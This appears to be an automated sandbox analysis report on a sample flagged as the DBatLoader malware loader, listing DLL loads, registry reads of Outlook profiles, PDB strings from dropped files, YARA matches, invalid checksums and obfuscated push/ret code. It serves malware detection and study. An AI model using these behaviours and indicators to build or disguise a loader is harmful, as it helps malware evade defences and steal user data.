Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: C6dAUcOA6M.exe Static file information: File size 1226752 > 1048576
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected DBatLoader
Source: Yara match File source: 0.2.C6dAUcOA6M.exe.2cf0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
.NET source code contains method to dynamically call methods (often used by packers)
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Binary contains a suspicious time stamp
Source: aymtmquJ.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D0894C
PE file contains an invalid checksum
Source: C6dAUcOA6M.exe Static PE information: real checksum: 0x0 should be: 0x138d20
Source: armsvc.exe.11.dr Static PE information: real checksum: 0x32318 should be: 0x13fe9a
Source: Juqmtmya.PIF.8.dr Static PE information: real checksum: 0x0 should be: 0x138d20
Source: Trading_AIBot.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x16b30
Source: elevation_service.exe0.13.dr Static PE information: real checksum: 0x1bb29d should be: 0x24d76e
Source: aymtmquJ.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
PE file contains sections with non-standard names
Source: alpha.pif.5.dr Static PE information: section name: .didat
Source: armsvc.exe.11.dr Static PE information: section name: .didat
Source: alg.exe.13.dr Static PE information: section name: .didat
Source: FXSSVC.exe.13.dr Static PE information: section name: .didat
Source: elevation_service.exe.13.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.13.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.13.dr Static PE information: section name: .retplne
Source: elevation_service.exe.13.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.13.dr Static PE information: section name: malloc_h
Source: elevation_service.exe0.13.dr Static PE information: section name: .00cfg
Source: elevation_service.exe0.13.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.13.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.13.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.13.dr Static PE information: section name: malloc_h
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D2FC push 02D1D367h; ret 0_2_02D1D35F
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF63AE push 02CF640Bh; ret 0_2_02CF6403
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF63B0 push 02CF640Bh; ret 0_2_02CF6403
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFC349 push 8B02CFC1h; ret 0_2_02CFC34E
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1C378 push 02D1C56Eh; ret 0_2_02D1C566
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF332C push eax; ret 0_2_02CF3368
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D0AC push 02D1D125h; ret 0_2_02D1D11D
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0306B push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0306C push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D1F8 push 02D1D288h; ret 0_2_02D1D280
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D144 push 02D1D1ECh; ret 0_2_02D1D1E4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D03107 push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F108 push ecx; mov dword ptr [esp], edx 0_2_02D0F10D
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF6784 push 02CF67C6h; ret 0_2_02CF67BE
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF6782 push 02CF67C6h; ret 0_2_02CF67BE
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9748 pushfd ; iretd 0_2_02CF9757
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9758 pushfd ; iretd 0_2_02CF975F
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9760 pushfd ; iretd 0_2_02CF9763
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFD5A0 push 02CFD5CCh; ret 0_2_02CFD5C4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1C570 push 02D1C56Eh; ret 0_2_02D1C566
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFC56C push ecx; mov dword ptr [esp], edx 0_2_02CFC571
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08AD8 push 02D08B10h; ret 0_2_02D08B08
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0AAE0 push 02D0AB18h; ret 0_2_02D0AB10
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFCA4E push 02CFCD72h; ret 0_2_02CFCD6A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFCBEC push 02CFCD72h; ret 0_2_02CFCD6A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D64850 push eax; ret 0_2_02D64920
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0886C push 02D088AEh; ret 0_2_02D088A6
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06946 push 02D069F3h; ret 0_2_02D069EB
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06948 push 02D069F3h; ret 0_2_02D069EB
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0790C push 02D07989h; ret 0_2_02D07981
